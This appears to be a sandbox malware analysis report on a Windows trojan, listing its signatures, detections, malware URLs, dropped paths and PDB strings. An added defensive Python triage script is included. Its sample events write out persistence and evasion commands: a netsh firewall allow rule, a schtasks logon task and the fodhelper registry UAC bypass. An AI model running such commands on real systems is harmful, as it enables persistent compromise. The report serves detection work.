Windows Analysis Report 4t4y4r89UZ

Overview

General Information

Sample Name: 4t4y4r89UZ (renamed file extension from none to exe)
Analysis ID: 519673
MD5: 14c0d8425930ccec0566b04864a05670
SHA1: 07fd6746417c89239e8b4b272fa350c5dc41c580
SHA256: fea538eff5bc9cd3970edda4b3ddfa0e72505b01dc207e47d8112074720fa05e
Tags: 32, exe, trojan

Detection

Metasploit
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected Metasploit Payload
Multi AV Scanner detection for submitted file
Detected unpacking (overwrites its own PE header)
Sigma detected: Schedule system process
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Creates an autostart registry key pointing to binary in C:\Windows
Sigma detected: System File Execution Location Anomaly
Uses netsh to modify the Windows network and firewall settings
Found Tor onion address
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses shutdown.exe to shutdown or reboot the system
Changes security center settings (notifications, updates, antivirus, firewall)
Machine Learning detection for sample
Creates files in the system32 config directory
May modify the system service descriptor table (often done to hook functions)
Machine Learning detection for dropped file
Modifies the windows firewall
Performs DNS TXT record lookups
Drops executables to the windows directory (C:\Windows) and starts them
Sigma detected: Bypass UAC via Fodhelper.exe
Uses schtasks.exe or at.exe to add and modify task schedules
Drops PE files with benign system names
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Creates files inside the system directory
PE file contains sections with non-standard names
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Found dropped PE file which has not been started or loaded
Downloads executable code via HTTP
Enables debug privileges
Is looking for software installed on the system
Drops files with a non-matching file extension (content does not match file extension)
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Contains capabilities to detect virtual machines
PE / OLE file has an invalid certificate
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Sigma detected: Netsh Port or Application Allowed
Sigma detected: Conhost Parent Process Executions
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection:

Multi AV Scanner detection for submitted file
Source: 4t4y4r89UZ.exe Virustotal: Detection: 33%
Antivirus detection for URL or domain
Source: https://runmodes.com/api/log Avira URL Cloud: Label: malware
Source: http://newscommer.com/app/app.exe URL Reputation: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Avira: detection malicious, Label: TR/Agent.twerk
Source: C:\Windows\windefender.exe Avira: detection malicious, Label: TR/Crypt.XPACK.eocey
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll Avira: detection malicious, Label: TR/Redcap.gsjan
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll Metadefender: Detection: 45%
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll ReversingLabs: Detection: 59%
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Metadefender: Detection: 13%
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe ReversingLabs: Detection: 73%
Source: C:\Windows\rss\csrss.exe ReversingLabs: Detection: 38%
Source: C:\Windows\windefender.exe Metadefender: Detection: 28%
Source: C:\Windows\windefender.exe ReversingLabs: Detection: 78%
Machine Learning detection for sample
Source: 4t4y4r89UZ.exe Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Windows\rss\csrss.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 14.3.csrss.exe.1694ea00.16.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 14.2.csrss.exe.16c44000.16.unpack Avira: Label: TR/Patched.Ren.Gen
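A host-side triage check for the persistence and defence-evasion behaviours in the Signatures list (csrss.exe executed from C:\Windows\rss, an autostart key pointing into C:\Windows, netsh firewall changes, schtasks.exe/at.exe, the fodhelper.exe UAC bypass) together with the dropped-file paths listed above. This is an added example and is not part of the Joe Sandbox report. The event dicts are a constructed, simplified Sysmon-like shape (the field names type, image, parent_image, cmdline, target and details are assumptions; real telemetry has to be mapped onto them), the command lines in the sample events are constructed because the report names the behaviours but does not print the exact commands, and the rule bodies are this example's own heuristics rather than the Sigma rules' exact conditions. The Run/RunOnce key used for the autostart check is likewise an assumption; the report does not name the key.

```python
"""Match host telemetry against the behaviours and dropped-file paths in this
report.  Added example, not part of the Joe Sandbox report.  Event shape is a
constructed, simplified Sysmon-like dict; real telemetry has to be mapped onto
these field names first."""
import re

# Dropped-file paths from "Antivirus detection for dropped file"; the sandbox
# user name (C:\Users\user) is replaced by a wildcard so the check works on any host.
DROPPED_FILE_PATTERNS = [
    re.compile(r"^c:\\windows\\rss\\csrss\.exe$"),
    re.compile(r"^c:\\windows\\windefender\.exe$"),
    re.compile(r"\\appdata\\local\\temp\\csrss\\injector\\"
               r"(injector\.exe|ntquerysysteminformationhook\.dll)$"),
]

# Binaries that only belong in the system directories ("System File Execution
# Location Anomaly"); the sample plants csrss.exe under C:\Windows\rss instead.
SYSTEM_NAMES = {"csrss.exe", "lsass.exe", "services.exe", "smss.exe",
                "svchost.exe", "winlogon.exe"}
LEGIT_SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\",
                     "c:\\windows\\winsxs\\")

# Assumption: the autostart key is a Run/RunOnce value; the report does not name it.
RUN_KEY = re.compile(r"\\software\\microsoft\\windows\\currentversion\\run(once)?\\")
# Registry path hijacked by the fodhelper.exe UAC bypass
MS_SETTINGS_CMD = re.compile(r"\\software\\classes\\ms-settings\\shell\\open\\command")


def _norm(path):
    """Lower-case a path and drop surrounding quotes; None becomes ''."""
    return (path or "").strip('"').lower()


def _basename(path):
    return _norm(path).rsplit("\\", 1)[-1]


def check_event(ev):
    """Return the report behaviours matched by one event (empty list if benign)."""
    hits = []
    kind = ev.get("type")
    image = _norm(ev.get("image"))
    name = _basename(image)
    cmd = (ev.get("cmdline") or "").lower()

    if kind == "process":
        if name in SYSTEM_NAMES and not image.startswith(LEGIT_SYSTEM_DIRS):
            hits.append("system_file_execution_location_anomaly")
        if name == "netsh.exe" and "firewall" in cmd:
            hits.append("netsh_firewall_modification")
        if (name == "schtasks.exe" and "/create" in cmd) or name == "at.exe":
            hits.append("scheduled_task_added")
        if name == "shutdown.exe" and re.search(r"\s[/-][rs](\s|$)", cmd):
            hits.append("shutdown_or_reboot")
        if _basename(ev.get("parent_image")) == "fodhelper.exe":
            hits.append("uac_bypass_fodhelper_child")
    elif kind == "file":
        target = _norm(ev.get("target"))
        if any(p.search(target) for p in DROPPED_FILE_PATTERNS):
            hits.append("known_dropped_file_path")
    elif kind == "registry":
        key = _norm(ev.get("target"))
        data = _norm(ev.get("details"))
        if (RUN_KEY.search(key) and data.startswith("c:\\windows\\")
                and not data.startswith(LEGIT_SYSTEM_DIRS)):
            hits.append("autostart_key_into_windows_dir")
        if MS_SETTINGS_CMD.search(key):
            hits.append("uac_bypass_fodhelper_registry")
    return hits


def triage(events):
    """Run check_event over a list of events; returns (event index, behaviour) pairs."""
    return [(i, h) for i, ev in enumerate(events) for h in check_event(ev)]


# Constructed sample telemetry; the command lines are illustrative, not from the report.
SAMPLE_EVENTS = [
    {"type": "file", "target": r"C:\Windows\rss\csrss.exe"},
    {"type": "process", "image": r"C:\Windows\rss\csrss.exe",
     "parent_image": r"C:\Users\alice\Desktop\4t4y4r89UZ.exe", "cmdline": "csrss.exe"},
    {"type": "registry", "target": r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\csrss",
     "details": r"C:\Windows\rss\csrss.exe"},
    {"type": "process", "image": r"C:\Windows\System32\netsh.exe",
     "parent_image": r"C:\Windows\rss\csrss.exe",
     "cmdline": 'netsh advfirewall firewall add rule name=csrss dir=in action=allow program="C:\\Windows\\rss\\csrss.exe"'},
    {"type": "process", "image": r"C:\Windows\System32\schtasks.exe",
     "parent_image": r"C:\Windows\rss\csrss.exe",
     "cmdline": 'schtasks /create /tn csrss /sc onlogon /tr "C:\\Windows\\rss\\csrss.exe"'},
    {"type": "registry", "target": r"HKCU\Software\Classes\ms-settings\shell\open\command",
     "details": r"C:\Windows\rss\csrss.exe"},
    {"type": "process", "image": r"C:\Windows\System32\csrss.exe",   # the real csrss.exe
     "parent_image": r"C:\Windows\System32\smss.exe", "cmdline": "csrss.exe"},
]

if __name__ == "__main__":
    for idx, behaviour in triage(SAMPLE_EVENTS):
        print(idx, behaviour)
```

The benign csrss.exe in System32 produces no hit, which is the point of keying the location anomaly on the directory rather than the file name; the dropped-file check deliberately ignores the user name segment so that the Temp\csrss\injector path matches on any profile.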

Compliance:

Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe Unpacked PE file: 0.2.4t4y4r89UZ.exe.400000.3.unpack
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe Unpacked PE file: 10.2.4t4y4r89UZ.exe.400000.2.unpack
Source: C:\Windows\rss\csrss.exe Unpacked PE file: 14.2.csrss.exe.400000.0.unpack
Source: C:\Windows\rss\csrss.exe Unpacked PE file: 23.2.csrss.exe.400000.2.unpack
Source: C:\Windows\rss\csrss.exe Unpacked PE file: 34.2.csrss.exe.400000.3.unpack
Source: C:\Windows\rss\csrss.exe Unpacked PE file: 42.2.csrss.exe.400000.1.unpack
Source: C:\Windows\rss\csrss.exe Unpacked PE file: 50.2.csrss.exe.400000.0.unpack
Uses 32bit PE files
Source: 4t4y4r89UZ.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: Binary string: Loader.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
Source: Binary string: EfiGuardDxe.pdb7 source: csrss.exe, csrss.exe, 00000032.00000002.400160271.0000000005200000.00000040.00000001.sdmp
Source: Binary string: Unrecognized pdb formatThis error indicates attempting to access a .pdb file with source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source: Binary string: A connection with the server could not be establishedAn extended error was returned from the WinHttp serverThe .pdb file is probably no longer indexed in the symbol server share location. source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source: Binary string: Age does not matchThe module age and .pdb age do not match. source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source: Binary string: symsrv.pdb source: csrss.exe
Source: Binary string: Cvinfo is corruptThe .pdb file contains a corrupted debug codeview information. source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source: Binary string: C:\Users\mac\Desktop\driver-process-monitor\x64\Release\WinmonProcessMonitor.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
Source: Binary string: Downloading symbols for [%s] %ssrv*symsrv*http://https://_bad_pdb_file.pdb source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source: Binary string: The symbol server has never indexed any version of this symbol fileNo version of the .pdb file with the given name has ever been registered. source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win7x64\x64\Release\SSDTHook.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
Source: Binary string: PDB not foundUnable to locate the .pdb file in any of the symbol search path locations. source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\Release\Winmon.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
Source: Binary string: C:\vbox\branch\w64-1.6\out\win.amd64\release\obj\src\VBox\HostDrivers\VBoxDrv\VBoxDrv.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
Source: Binary string: Drive not readyThis error indicates a .pdb file related failure. source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\x64\Release\Winmon.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
Source: Binary string: Error while loading symbolsUnable to locate the .pdb file in any of the symbol search source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source: Binary string: zzz_AsmCodeRange_*FrameDatainvalid string positionstring too long.pdb source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source: Binary string: C:\Users\vladimir\source\repos\driver-process-monitor\Release\WinmonProcessMonitor.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
Source: Binary string: Pdb read access deniedYou may be attempting to access a .pdb file with read-only attributes source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source: Binary string: Unable to locate the .pdb file in this location source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\x64\Release\WinmonFS.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
Source: Binary string: The module signature does not match with .pdb signature. source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source: Binary string: .pdb.dbg source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source: Binary string: '(EfiGuardDxe.pdbx source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source: Binary string: symsrv.pdbGCTL source: 4t4y4r89UZ.exe, 00000000.00000002.292634106.0000000000C55000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.300061428.00000000060D3000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.551813836.0000000000C55000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.363596992.0000000000C55000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.392506023.0000000000C55000.00000040.00020000.sdmp
Source: Binary string: or you do not have access permission to the .pdb location. source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\Release\WinmonFS.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
Source: Binary string: An Exception happened while downloading the module .pdbPlease open a bug if this is a consistent repro. source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source: Binary string: EfiGuardDxe.pdb source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win7,10x32\Release\win7x32.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
Source: Binary string: C:\Users\vladimir\source\repos\driver-process-monitor\x64\Release\WinmonProcessMonitor.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
Source: Binary string: Signature does not matchThe module signature does not match with .pdb signature source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source: Binary string: dbghelp.pdb source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win10x64\x64\Release\SSDTHook.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
Source: Binary string: dbghelp.pdbGCTL source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp

Networking:

Found Tor onion address
